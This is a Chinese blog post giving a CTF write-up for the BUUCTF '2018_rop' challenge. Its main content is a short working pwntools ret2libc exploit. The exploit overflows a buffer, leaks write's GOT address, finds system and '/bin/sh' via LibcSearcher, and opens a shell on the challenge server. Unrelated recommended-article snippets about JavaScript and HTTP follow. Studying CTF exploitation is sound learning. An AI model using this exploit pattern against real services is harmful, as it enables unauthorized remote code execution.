BUUCTF 刷题 铁人三项(第五赛区)_2018_rop

最新推荐文章于 2025-02-10 17:01:24 发布
原创 最新推荐文章于 2025-02-10 17:01:24 发布 · 2.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #安全 #web安全 #经验分享

这篇博客详细介绍了如何通过在BUUCTF竞赛中利用ROP技术(Return-Oriented Programming)进行直接ret2libc攻击,涉及payload构建、write函数参数填充以及Libc搜索过程。最终目标是利用system调用执行shell,展示了从本地攻击到远程交互的完整流程。

BUUCTF在线评测

直接ret2libc,很简单,但是write函数有三个参数要填充

exp:

from pwn import *
from LibcSearcher import *

context(os = 'linux',arch = 'i386',log_level = 'debug')
#r = process('./rop')
r = remote('node4.buuoj.cn','26575')
elf = ELF('./rop')

main = 0x080484C6


payload = 'a'*140 + p32(elf.plt['write']) +p32(main)+p32(1)+ p32(elf.got['write']) +p32(0x4)
r.sendline(payload)
write_addr = u32(r.recv(4))
print(hex(write_addr))

libc = LibcSearcher('write',write_addr)
offset = write_addr - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')

payload = 'a'*140 + p32(system) + 'bbbb' + p32(binsh)
r.sendline(payload)

r.interactive()

手写 callapplybind 函数
weixin_47450807的博客
02-26 4878
手写 callapplybind 函数
js代码-generator apply call bind
07-16
`apply`、`call`和`bind`都是关于函数调用的方法,它们用于改变函数调用时的上下文(即`this`的值)以及传递参数。 1. `apply`方法接收两个参数:一个是`this`值,另一个是参数数组。它会将数组的元素作为参数传递...
this apply call bind
不能再菜
01-14 452
this apply call bindapply callapply call 的区别bindapply call bind 的比较总结 apply call 在 javascript 中,callapply 都是为了改变某个函数运行时的上下文(context)而存在的,换句话说,就是为了改变函数体内部 this 的指向。 JavaScript 的一大特点是,函数存在「定义时上下文」和「运...
this以及bindapplycall
CamilleZJ的博客
05-27 453
callapplybind的作用是改变函数运行时this的指向。 一、this 1、普通函数中的this function fn1(){ console.log(this) //window } fn1() var a = 1; function fn(){ console.log(this.a); } fn(); //输出1 setTimeout(function() { console.log(this) //window function fn(){ ..
callapplybind
xing476255461的博客
10-19 879
javascript中callapply以及bind都可以改变this指向 在代码中,当一个对象A具有一个方法fn,另一个对象B没有方法,但是需要用到同样功能的fn方法时,可以通过改变A对象中函数fn的执行上下文(this)来实现调用,达到节约代码空间,不产生冗余函数的目的。(字面量创建对象写法): var A = { name: "AAA", fn: function(skil...
手写 apply call bind 实现
Jioho的博客
06-29 628
apply call bind 相关 对于 apply call bind 之前也有写过一篇很详细的入门级文章 applycallbind 用法和区别 了解用法后,最好还是了解其实现原理,这样才能掌握透彻 三者的区别 callapply 都是为了解决改变 this 的指向。作用都是相同的,只是传参的方式不同 除了第一个参数外,call 可以接收一个参数列表,apply 只接受一个参数数组 bind 和其他两个方法作用也是一致的,只是该方法会返回一个函数。并不会立刻执行 手写 call
call ,applybind方法 详解
热门推荐
06-19 3万+
JavaScript 函数callapplybind的区别和用法详解
手写apply/callbind
最新发布
xiaobangkeji的博客
02-10 439
手写apply/callbind
手写call,apply,bind函数
白天不懂夜的黑
02-22 1万+
涉及面试题 call,apply,bind函数内部实现是怎样的? 考虑两点: 第一个参数为undefined或null的时候,那么会转变为window 改变了this执行,让新的对象可以执行该函数。 call Function.prototype.myCall = function(context) { if (typeof context === "undefined" || c...
细说 callapply 以及 bind 的区别和用法-详解
JackieDYH的博客
09-05 2213
callapply 的共同点 它们的共同点是,都能够改变函数执行时的上下文,将一个对象的方法交给另一个对象来执行,并且是立即执行的。 为何要改变执行上下文?举一个生活中的小例子:平时没时间做饭的我,周末想给孩子炖个腌笃鲜尝尝。但是没有适合的锅,而我又不想出去买。所以就问邻居借了一个锅来用,这样既达到了目的,又节省了开支,一举两得。 改变执行上下文也是一样的,A 对象有一个方法,而 B 对象因为某种原因,也需要用到同样的方法,那么这时候我们是单独为 B 对象扩展一个方法呢,还是借用一下 A 对象
JavaScript中 固定 this指向 (callapplybind 函数)
qq_36647492的博客
10-18 1107
由于对象的属性可以赋给另一个对象,所以属性所在的当前对象是可变的,即this的指向是可变的。 this的动态切换,固然为 JavaScript 创造了巨大的灵活性,但也使得编程变得困难和模糊。 有时,需要把this固定下来,避免出现意想不到的情况
Javascript中callapplybind方法的详解与总结
10-20
理解了callapplybind方法的区别后,我们就可以根据不同的需求选择适合的方法来处理函数的this绑定和函数调用。这在处理回调函数、事件处理器以及需要将类数组对象转换为数组等场景下,提供了极大的灵活性和便利...
开启Javascript中applycallbind的用法之旅模式
10-23
为了控制函数的this指向,JavaScript提供了applycall以及bind方法。以下详细解释了applycall以及bind的用法,并通过实例加深理解。 1. apply()和call()方法 apply()和call()方法都用于指定函数体内this的值。...
JavaScript中的this/call/apply/bind
01-08
了解并熟练掌握`this`、`call()`、`apply()`和`bind()`的用法,对于编写复杂的JavaScript代码,尤其是在涉及对象、事件处理和模块化编程时,至关重要。它们提供了控制函数执行上下文的能力,使我们能够灵活地处理...
出现undefined的几种情况
imkaifan的博客
01-04 9031
出现undefined的几种情况
错误码401、 状态码 401
imkaifan的博客
08-29 8188
HTTP 状态码 401 表示“未授权”(Unauthorized)。当服务器返回这个状态码时,通常意味着请求需要用户身份验证。具体来说,会发生以下情况:身份验证失败:用户提供的凭据(如用户名和密码)不正确,或者未提供凭据。需要身份验证:服务器可能会返回一个 WWW-Authenticate 头,指示客户端需要提供身份验证信息。访问被拒绝:即使提供了凭据,用户可能没有权限访问请求的资源。重定向到登录页面:在某些情况下,客户端可能会被重定向到登录页面,以便用户输入有效的凭据。
if语句中什么时候可以省略大括号?
imkaifan的博客
03-10 6373
有大括号的时候 大括号里面所有的 都归if管。只有条件为真的时候 才会执行。 没有大括号的时候 只有下面的 一句 归if管, 也就是说 当只有一句的时候 大括号可以省略 其它的 没区别 //注意观察此代码中的if语句 login() { this.$refs.loginFromRef.validate(async (valid) => { //登录前的一个预验证 // console.log(valid) if (!valid) retur
try...catch和 await的用法
imkaifan的博客
03-09 3156
try...catch和 await的用法
axios以简写的形式发送get,post请求
imkaifan的博客
12-01 2555
1、post请求,第二个是参数项,没有的话,就直接写个null就行了,然后第三个参数配置请求头之类的 const res = await API.post('/user/logout', null,{ headers: { authorization: getToken() } }) logout = ()=> { Modal.alert('提示', '是否确定退出?', [ { text: '取
cocos apply call bind
09-30
"Cocos Apply Call Bind"是Cocos2d-x游戏框架中的一个重要概念,它与事件处理和回调函数绑定有关。在Cocos2d-x中,`apply`通常用于Lambda表达式或函数指针的传递,而`call`则是用来执行这些绑定的函数。 具体来说:...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello Sally

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值